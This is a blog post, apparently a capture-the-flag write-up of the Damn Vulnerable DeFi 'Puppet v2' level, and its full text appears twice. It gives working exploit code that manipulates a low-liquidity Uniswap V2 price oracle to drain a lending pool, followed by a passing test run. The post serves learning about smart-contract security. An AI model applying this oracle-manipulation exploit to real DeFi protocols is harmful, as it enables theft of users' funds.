web3maxi
web3maxi
Subscribe to Runstar
Subscribe to Runstar
Share Dialog
Share Dialog
<100 subscribers
<100 subscribers
The developers of the last lending pool are saying that they've learned the lesson. And just released a new version!
Now they're using a Uniswap v2 exchange as a price oracle, along with the recommended utility libraries. That should be enough.
You start with 20 ETH and 10000 DVT tokens in balance. The new lending pool has a million DVT tokens in balance. You know what to do ;)
UniswapV2 文档UniswapV2Library.sol
目标: 取走借贷池中所有DVT token
after(async function () {
/** SUCCESS CONDITIONS */
// Attacker has taken all tokens from the pool
expect(await this.token.balanceOf(this.lendingPool.address)).to.be.eq("0");
expect(await this.token.balanceOf(attacker.address)).to.be.gte(POOL_INITIAL_TOKEN_BALANCE);
});
本关将UniswapV1升级至UniswapV2, 但本质上是由于交易对中流动性过低导致币价可以被轻易操控, 而借贷池预言机又来自于UniswapV2, 因此攻击思路与上一关相同
it("Exploit", async function () {
/** CODE YOUR EXPLOIT HERE */
await this.token
.connect(attacker)
.approve(this.uniswapRouter.address, ATTACKER_INITIAL_TOKEN_BALANCE);
await this.uniswapRouter
.connect(attacker)
.swapExactTokensForETH(
ATTACKER_INITIAL_TOKEN_BALANCE,
1,
[this.token.address, this.uniswapRouter.WETH()],
attacker.address,
(await ethers.provider.getBlock("latest")).timestamp * 2,
);
const collateral = await this.lendingPool.calculateDepositOfWETHRequired(
POOL_INITIAL_TOKEN_BALANCE,
);
await this.weth.connect(attacker).deposit({ value: collateral });
await this.weth.connect(attacker).approve(this.lendingPool.address, collateral);
await this.lendingPool.connect(attacker).borrow(POOL_INITIAL_TOKEN_BALANCE);
});
运行通过
❯ yarn run puppet-v2
yarn run v1.22.19
warning ../../package.json: No license field
$ yarn hardhat test test/puppet-v2/puppet-v2.challenge.js
warning ../../package.json: No license field
$ /home/runstar/solidityLearn/damn-vulnerable-defi/node_modules/.bin/hardhat test test/puppet-v2/puppet-v2.challenge.js
[Challenge] Puppet v2
✓ Exploit (608ms)
1 passing (4s)
Done in 6.14s.
Twitter: @0xRunstar
The developers of the last lending pool are saying that they've learned the lesson. And just released a new version!
Now they're using a Uniswap v2 exchange as a price oracle, along with the recommended utility libraries. That should be enough.
You start with 20 ETH and 10000 DVT tokens in balance. The new lending pool has a million DVT tokens in balance. You know what to do ;)
UniswapV2 文档UniswapV2Library.sol
目标: 取走借贷池中所有DVT token
after(async function () {
/** SUCCESS CONDITIONS */
// Attacker has taken all tokens from the pool
expect(await this.token.balanceOf(this.lendingPool.address)).to.be.eq("0");
expect(await this.token.balanceOf(attacker.address)).to.be.gte(POOL_INITIAL_TOKEN_BALANCE);
});
本关将UniswapV1升级至UniswapV2, 但本质上是由于交易对中流动性过低导致币价可以被轻易操控, 而借贷池预言机又来自于UniswapV2, 因此攻击思路与上一关相同
it("Exploit", async function () {
/** CODE YOUR EXPLOIT HERE */
await this.token
.connect(attacker)
.approve(this.uniswapRouter.address, ATTACKER_INITIAL_TOKEN_BALANCE);
await this.uniswapRouter
.connect(attacker)
.swapExactTokensForETH(
ATTACKER_INITIAL_TOKEN_BALANCE,
1,
[this.token.address, this.uniswapRouter.WETH()],
attacker.address,
(await ethers.provider.getBlock("latest")).timestamp * 2,
);
const collateral = await this.lendingPool.calculateDepositOfWETHRequired(
POOL_INITIAL_TOKEN_BALANCE,
);
await this.weth.connect(attacker).deposit({ value: collateral });
await this.weth.connect(attacker).approve(this.lendingPool.address, collateral);
await this.lendingPool.connect(attacker).borrow(POOL_INITIAL_TOKEN_BALANCE);
});
运行通过
❯ yarn run puppet-v2
yarn run v1.22.19
warning ../../package.json: No license field
$ yarn hardhat test test/puppet-v2/puppet-v2.challenge.js
warning ../../package.json: No license field
$ /home/runstar/solidityLearn/damn-vulnerable-defi/node_modules/.bin/hardhat test test/puppet-v2/puppet-v2.challenge.js
[Challenge] Puppet v2
✓ Exploit (608ms)
1 passing (4s)
Done in 6.14s.
Twitter: @0xRunstar
No activity yet